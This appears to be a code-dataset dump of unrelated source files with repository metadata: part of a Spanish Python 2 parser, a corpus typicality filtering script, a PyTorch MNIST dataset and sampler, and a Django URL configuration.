            fact = self.analizaFactor()
            nodoCuasiMult = AST.NodoAritmetico(hered, fact, self.lexico.nlinea, "Y")
            return self.analizaRestoTerm(nodoCuasiMult)
        elif (self.componente.cat == "PR" and self.componente.valor in ["ENTONCES", "HACER", "SINO", "O"]) or self.componente.cat == "ParentCi" or self.componente.cat == "CorCi" or self.componente.cat == "OpRel" or self.componente.cat == "PtoComa" or self.componente.cat == "OpAdd":
            return hered
        else:
            print "Error: SE ESPERABA Resto de Termino en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor in ["O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaFactor(self):
        """Parse a factor: variable, number, '(expr)', NO, CIERTO or FALSO."""
        if self.componente.cat == "Identif":
            return self.analizaVariable()
        elif self.componente.cat == "Numero":
            nodo = None
            # NOTE(review): `is` compares identity, not equality; this relies
            # on string interning and should be `==`.
            if self.componente.tipo is "ENTERO":
                nodo = AST.NodoEntero(self.componente.valor, self.lexico.nlinea)
            else:
                nodo = AST.NodoReal(self.componente.valor, self.lexico.nlinea)
            self.avanza()
            return nodo
        elif self.componente.cat == "ParentAp":
            self.avanza()
            nodo = self.analizaExpresion()
            self.comprueba("ParentCi")
            return nodo
        elif self.componente.cat == "PR" and self.componente.valor == "NO":
            # Logical negation: arithmetic node with a None left child.
            self.avanza()
            fact = self.analizaFactor()
            return AST.NodoAritmetico(None, fact, self.lexico.nlinea, "NO")
        elif self.componente.cat == "PR" and self.componente.valor == "CIERTO":
            self.avanza()
            return AST.NodoBooleano("CIERTO", self.lexico.nlinea)
        elif self.componente.cat == "PR" and self.componente.valor == "FALSO":
            self.avanza()
            return AST.NodoBooleano("FALSO", self.lexico.nlinea)
        else:
            print "Error: SE ESPERABA Factor en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor in ["Y","O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "OpMult" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
                self.avanza()
            return
    def analizaSigno(self):
        """Consume a '+'/'-' sign token."""
        if self.componente.cat == "OpAdd":
            self.avanza()
        else:
            print "Error: SE ESPERABA Operador Suma o Resta en linea " + str(self.lexico.nlinea)
            while not ((self.componente.cat == "PR" and self.componente.valor in ["NO","CIERTO", "FALSO"]) or self.componente.cat == "Identif" or self.componente.cat == "Numero" or self.componente.cat == "ParentAp"):
                self.avanza()
            return
############################################################################
#
# Funcion: __main__
# Tarea: Programa principal de prueba del analizador sintactico
# Parametros: --
# Devuelve: --
#
############################################################################
if __name__=="__main__":
    # Usage: python anasint.py <source-file>
    script, filename=argv
    txt=open(filename).read()
    print "Este es tu fichero %r" % filename
    i=0
    # Pipeline: character stream -> lexer -> parser (parsing runs in the ctor).
    fl = flujo.Flujo(txt)
    analex=analex.Analex(fl)
    anasint = Anasint(analex)
    print (anasint.ast)
    # Pretty-print each AST node produced for the instruction list.
    for nodo in anasint.ast:
        if nodo is not None:
            print nodo.arbol()
| 2.8125 | 3 |
src/TF_main.py | valevo/thesis | 1 | 12761048 | # -*- coding: utf-8 -*-
from data.reader import wiki_from_pickles, corpus_to_pickle
from data.corpus import Sentences
from stats.stat_functions import compute_freqs, merge_to_joint
from stats.entropy import typicality
from filtering.typicality import setup_filtering, filter_typicality_incremental
from operator import lt, gt
import argparse
def parse_args():
    """Read --lang, --n_tokens and --factor from the command line."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--lang", type=str)
    parser.add_argument("--n_tokens", type=int)
    parser.add_argument("--factor", type=float,
                        help="The factor to multiply epsilon with; determines"
                        "the degree of atypicality.")
    parsed = parser.parse_args()
    return parsed.lang, parsed.n_tokens, parsed.factor
if __name__ == "__main__":
    lang, n, factor = parse_args()
    # Corpus size used to fit the Zipf model: roughly half of all tokens.
    big_n = lambda wiki: len([w for a in wiki for s in a for w in s])*.49
    setup_m = 100  # samples used to estimate the typicality statistics
    m = 10         # number of filtered corpora to generate
    wiki = list(wiki_from_pickles("data/"+lang+"_pkl"))
    sents = [s for a in wiki for s in a]
    # Fit the rank model and estimate mean/std typicality over samples.
    zipf_model, rank_dict, mean_typ, std_typ, auto_typ = setup_filtering(wiki,
                                                                        big_n(wiki),
                                                                        n,
                                                                        setup_m)
    # Epsilon band around the model's own typicality, scaled by `factor`.
    mean_corrected = abs(mean_typ - auto_typ)
    epsilon_f_plus = mean_corrected + std_typ*factor
    epsilon_f_minus = - epsilon_f_plus
    print("\nModel and Epsilon established")
    print(auto_typ, mean_typ, std_typ)
    print(epsilon_f_minus, epsilon_f_plus)
    for m_i in range(m):
        print("started ", m_i)
        # Keep sentences while the running typicality stays below the
        # negative epsilon bound (i.e. build atypical corpora).
        filtered = list(filter_typicality_incremental(sents, zipf_model,
                        rank_dict, auto_typ, n, epsilon_f_minus, lt))
        filtered_freqs = compute_freqs(Sentences(filtered))
        print("filtered ", m_i, " typicality: ",
              typicality(zipf_model, merge_to_joint(rank_dict, filtered_freqs)))
        name = "_".join((str(n), str(factor), str(m_i)))
        # NOTE: the original final line carried trailing dataset-metadata
        # junk ("| 2.546875 | 3 |") which broke syntax; it has been stripped.
        corpus_to_pickle(filtered, "results/" + lang + "/TF", name)
src/adagraph/dataloaders/mnist.py | anshuln/Training-for-the-Future | 1 | 12761049 | import torch
import torch.utils.data as data
from torchvision.datasets.folder import has_file_allowed_extension, is_image_file, IMG_EXTENSIONS, pil_loader, accimage_loader,default_loader
from PIL import Image
import sys
import os
import os.path
import numpy as np
from random import shuffle
# Mapping from US state name to its region label (insertion order preserved).
REGIONS_DICT = {
    'Alabama': 'South', 'Arizona': 'SW', 'California': 'Pacific',
    'Florida': 'South', 'Indiana': 'MW', 'Iowa': 'MW', 'Kansas': 'MW',
    'Massachusetts': 'NE', 'Michigan': 'MW', 'Missouri': 'South',
    'Montana': 'RM', 'New-York': 'MA', 'North-Carolina': 'South',
    'Ohio': 'MW', 'Oklahoma': 'SW', 'Oregon': 'Pacific',
    'Pennsylvania': 'MA', 'South-Carolina': 'South', 'South-Dakota': 'MW',
    'Texas': 'SW', 'Utah': 'RM', 'Vermont': 'NE', 'Virginia': 'South',
    'Washington': 'Pacific', 'Wyoming': 'RM',
}
# Integer index for each region; the inverse table is derived so the two
# can never drift out of sync.
REGIONS_TO_IDX = {'RM': 6, 'MA': 1, 'NE': 2, 'South': 3, 'Pacific': 4, 'MW': 0, 'SW': 5}
IDX_TO_REGIONS = {idx: region for region, idx in REGIONS_TO_IDX.items()}
def make_dataset(dir, class_to_idx, extensions, domains, start=1934):
    """Collect (path, class-index) samples whose decade/region is in *domains*.

    File names are expected to look like ``<year>_<city>_...``; the year is
    bucketed into decades anchored at *start* and the city is mapped to a
    region via REGIONS_DICT.  Returns ``(images, meta)`` where ``meta`` holds
    ``[year, region]`` for each kept sample.
    """
    images, meta = [], []
    dir = os.path.expanduser(dir)
    for target in sorted(os.listdir(dir)):
        class_dir = os.path.join(dir, target)
        if not os.path.isdir(class_dir):
            continue
        for root, _, fnames in sorted(os.walk(class_dir)):
            for fname in sorted(fnames):
                if not has_file_allowed_extension(fname, extensions):
                    continue
                path = os.path.join(root, fname)
                name_parts = path.split('/')[-1].split('_')
                year = int(name_parts[0])
                region = REGIONS_DICT[name_parts[1]]
                # Anchor the year to the decade it falls in, relative to `start`.
                pivot_year = start + (year - start) // 10 * 10
                if (pivot_year, region) in domains:
                    images.append((path, class_to_idx[target]))
                    meta.append([year, region])
    return images, meta
class MNIST(data.Dataset):
    """Domain-filtered MNIST-style dataset backed by pre-exported .npy arrays.

    Expects ``X.npy`` (images), ``Y.npy`` (labels), ``A.npy`` (auxiliary
    attribute) and ``U.npy`` (normalised domain value) under *root*.  Only
    samples whose integer domain ``U * 6`` equals the first element of some
    tuple in *domains* are kept.
    """

    def __init__(self, root, transform=None, target_transform=None, domains=None):
        """Load the arrays from *root* and keep only the requested domains.

        domains -- iterable of tuples whose first element is an integer
                   domain index; None/empty selects no samples.
        (Default changed from the mutable ``[]`` to ``None``; behaviour for
        callers that omitted the argument is unchanged.)
        """
        domains = [] if domains is None else domains
        loader = default_loader
        self.root = root
        X = np.load("{}/X.npy".format(self.root))
        Y = np.load("{}/Y.npy".format(self.root))
        A = np.load("{}/A.npy".format(self.root))
        U = np.load("{}/U.npy".format(self.root))
        # U is stored normalised; scale back to the (float) domain index.
        U_ = (U * 6).astype('d')
        indices = []
        for d in domains:
            indices += [i for i, x in enumerate(U_) if x == d[0]]
        self.X = X[indices]
        self.Y = Y[indices]
        self.U = U[indices]
        self.A = A[indices]
        self.loader = loader
        # Store the transforms: the original accepted but never assigned
        # them, so __repr__ crashed with AttributeError.
        self.transform = transform
        self.target_transform = target_transform

    def _find_classes(self, dir):
        """Map each class subdirectory of *dir* to an integer label."""
        if sys.version_info >= (3, 5):
            # Faster and available in Python 3.5 and above
            classes = [d.name for d in os.scandir(dir) if d.is_dir()]
        else:
            classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]
        classes.sort()
        class_to_idx = {classes[i]: i for i in range(len(classes))}
        return classes, class_to_idx

    def __getitem__(self, index):
        """
        Args:
            index (int): Index

        Returns:
            tuple: (sample, domain, target) — the single-channel image tiled
            to 3 channels as float32, the integer domain, and the label.
        """
        sample = self.X[index]
        target = self.Y[index]
        domain = self.U[index]
        # NOTE(review): int() truncates; relies on U*6 being exactly
        # representable — confirm U values are k/6 without rounding error.
        return np.repeat(sample, 3, axis=0).astype('f'), int(domain * 6), target

    def get_meta(self):
        """Return per-sample metadata as an array of (U, A) pairs.

        NOTE(review): the original returned ``np.array(self.meta)``, but
        ``self.meta`` was never assigned (the path-based pipeline that built
        it is gone), so this always raised AttributeError.  Assumes U and A
        are 1-D — confirm against the exported arrays.
        """
        return np.column_stack((self.U, self.A))

    def __len__(self):
        return len(self.X)

    def __repr__(self):
        fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
        fmt_str += '    Number of datapoints: {}\n'.format(self.__len__())
        fmt_str += '    Root Location: {}\n'.format(self.root)
        tmp = '    Transforms (if any): '
        fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
        tmp = '    Target Transforms (if any): '
        fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
        return fmt_str
class MNISTSampler(torch.utils.data.sampler.Sampler):
    """Batch-homogeneous sampler: each consecutive run of ``bs`` indices is
    drawn from a single domain (one distinct value of ``data_source.U``).
    """

    def __init__(self, data_source, bs):
        """Group sample indices by their domain value and shuffle each group.

        data_source -- dataset exposing a per-sample ``U`` sequence and len().
        bs          -- number of consecutive indices drawn from one domain.
        """
        self.data_source = data_source
        self.meta = self.data_source.U
        self.dict_meta = {}   # domain value -> list of sample indices
        self.indeces = {}     # domain value -> consumption cursor
        self.keys = []        # domain values in first-seen order
        self.bs = bs
        for idx, u in enumerate(self.meta):
            # Explicit membership test replaces the original bare `except:`,
            # which would also have swallowed unrelated errors.
            if u not in self.dict_meta:
                self.dict_meta[u] = []
                self.keys.append(u)
            self.dict_meta[u].append(idx)
            self.indeces[u] = 0
        for key in self.keys:
            shuffle(self.dict_meta[key])

    def _sampling(self, idx, n):
        """Return the next *n* indices for domain *idx*, recycling the list
        (with repetition) when it runs out."""
        # Keep doubling so even n > len(list) is served; the original doubled
        # only once, which could under-fill for very small domains.
        while self.indeces[idx] + n >= len(self.dict_meta[idx]):
            self.dict_meta[idx] = self.dict_meta[idx] + self.dict_meta[idx]
        self.indeces[idx] = self.indeces[idx] + n
        return self.dict_meta[idx][self.indeces[idx] - n:self.indeces[idx]]

    def _shuffle(self):
        """Build one epoch: pick a random domain per batch, bs indices each."""
        order = np.random.randint(len(self.keys), size=(len(self.data_source) // (self.bs)))
        sIdx = []
        for i in order:
            sIdx = sIdx + self._sampling(self.keys[i], self.bs)
        return np.array(sIdx)

    def __iter__(self):
        return iter(self._shuffle())

    def __len__(self):
        # Integer arithmetic: the original used true division, which returns
        # a float under Python 3 and breaks len(sampler).
        return len(self.data_source) // self.bs * self.bs
| 2.140625 | 2 |
insta/urls.py | kaphie/InstaClone | 0 | 12761050 | from django.urls import path, include
from django.contrib.auth import views as auth_views
from .views import (
PostlistView,
PostCreateView,
PostDetailView,
PostUpdateView,
PostDeleteView,
saved_posts,
PostLikeToggle,
)
app_name = 'insta'  # URL namespace: reverse with 'insta:<name>'
urlpatterns = [
    #local : http://127.0.0.1:8000/
    path('', PostlistView.as_view(), name='post_list'),
    path('new/', PostCreateView.as_view(), name='post_create'),
    path('<int:id>', PostDetailView.as_view(), name='post_detail'),
    # NOTE(review): 'new/' is registered twice; this second entry is shadowed
    # for URL resolution but its name remains usable for reversing — confirm
    # whether one of the two routes should be removed.
    path('new/', PostCreateView.as_view(), name='post_new'),
    path('<int:id>/update/', PostUpdateView.as_view(), name='post_update'),
    path('<int:id>/delete/', PostDeleteView.as_view(), name='post_delete'),
    path('<int:id>/likes/', PostLikeToggle.as_view(), name='like_toggle'),
    path('saved/', saved_posts, name='saved_posts'),
    # path('login/', auth_views.login, name='login'),
    # path('user_profile/', auth_views.user_profile, name='user_profile'),
]
| 1.945313 | 2 |